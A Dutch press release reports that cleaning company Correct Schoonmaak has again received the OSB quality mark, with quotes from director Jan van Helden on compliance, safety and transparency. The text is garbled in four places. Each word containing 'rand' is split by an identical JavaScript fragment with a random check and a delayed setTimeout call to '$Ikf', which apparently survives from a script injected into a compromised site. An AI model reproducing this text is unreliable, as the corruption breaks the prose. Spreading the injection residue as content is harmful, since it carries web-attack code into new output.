Correct Groep ontvangt OSB-keurmerk

Correct Schoonmaak garandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeert een zuivere schoonmaakoplossing. Daarom ontving algemeen directeur Jan van Helden op woensdag 11 juni opnieuw het OSB-Keurmerk.
Correct Schoonmaak is lid van de OSB. Dit is hét keurmerk van de schoonmaakbranche. Jan van Helden geeft aan dat de bedrijven die lid zijn van de OSB samen verantwoordelijk zijn voor het niveau van de professionaliteit, kwaliteit en omgangsvormen in de branche. “Deze code geeft aan dat ons geleverde werk zorgvuldig, sociaal, transparant en controleerbaar moet zijn. Zorgvuldig houdt in dat wij ons houden aan de wet- en regelgeving, zoals uitbetaling volgens de CAO en wij werken niet met mensen die illegaal in Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and verblijven. Wij discrimineren niet, maar investeren juist in onze mensen middels scholing.”
 
Samen voor een schone zaak
Ook de aspecten rondom de veiligheid en transparantie worden door het OSB-Keurmerk gewaarborgd. “De veiligheid van onze medewerkers is erg belangrijk. Daarom voeren wij een actief gezondheidsbeleid om de risico’s te vermijden en de gezondheid te bevorderen. Het lidmaatschap garandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeert ook transparantie. Offertes zijn duidelijk en controleerbaar, met realistische prijzen. Onze klanten moeten controleren of wij de code naleven. Wij verlenen alle medewerking om informatie te leveren om deze controle mogelijk te maken. Samen voor een schone zaak!”
Over Correct Schoonmaak
Correct Schoonmaak is een onderdeel van Correct-Groep en is een familiebedrijf dat bestaat sinds 1977. Zij zijn actief in bijna alle sectoren. Van particulieren tot overheidsinstellingen en van scholen tot ziekenhuizen. Jan van Helden is trots op deze poot van zijn bedrijf. “Bij Correct Schoonmaak weet u precies waar u aan toe bent. Volgens afspraak gaan wij gedreven en professioneel aan de slag. Vooraf staat alles vast, dus geen onduidelijkheid achteraf. Het schoonmaken is de afgelopen jaren verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderd. Bij ons krijgt u een goede schoonmaakoplossing, van deze tijd. Want wij blinken uit in schoonmaak!”